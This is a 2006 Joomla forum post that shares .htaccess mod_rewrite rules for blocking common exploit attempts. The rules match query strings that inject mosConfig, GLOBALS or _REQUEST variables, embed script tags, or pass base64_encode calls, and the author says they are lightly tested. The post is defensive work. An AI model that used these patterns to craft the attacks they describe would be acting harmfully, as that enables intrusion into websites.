Alright, so there are a lot of noticeable trends in how people exploit Joomla websites and I have seen a lot of simple mod_rewrite configurations that attempt to address this issue but in my opinion they were often to vague and could easily cause problems with the sites normal functions. Hence, I have tried to hash out a set of mod_rewrite conditions that you can tag onto the end of your .htaccess files that will hopefully block out a good number of the common exploit attempts while interferring as little as possible with legitimate usage.
Keep in mind, this is just a trial script I have not had a whole lot of time to test it. You will know it is working correctly/incorrectly if you get forwarded to your home page and receive a 403 Forbidden error.
Append to .htaccess in the same directory as your index.php file.
Code:
########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
* Edited last line as the F option is compatible with more versions of Apache than R=403 *
* Edited to include conditions to match recent com_simpleboard and com_extcalendar exploits *
* Edited to remove the conditions that matched com_simpleboard and com_extcalendar specifically *
* Last updated on August 2, 2006 1:35 AM PDT (UTC -8:00) *
I am of course open to comments and suggestions. Your site should still be very usable with this code in place because of how specific I have tried to make the conditions. For example, it will not block out a search string that includes GLOBALS, only one that includes something to the effect of GLOBALS=... or GLOBALS[... or GLOBALS = (URL encoded space, etc)..
It attempts to deal with exploit attempts that try and set _REQUEST variables or GLOBAL variables as well as those that use XSS vulnerabilities and include javascripts with in the URL. It also attempts to block any script trying to assign a value to a mosConfig value and scripts that try and base64_encode information to pass it through the URL.
If this breaks some feature of your site, just comment out the rules by placing a # in front of them and everything should go back to normal. Let me know what you were doing and copy the URL and save it and I will try and work through it and figure out a way to allow the legitimate requests.
Hope it helps some of you guys worried about your sites security.
This thread has been split in order to help keep the forum cleaned up. Please discuss this topic here:
http://forum.joomla.org/index.php/topic,76578.msg388696.html#msg388696_________________
Rob Schley - Open Source Matters
Webimagery -
http://www.webimagery.net/ - Professional Consulting Services
JXtended -
http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
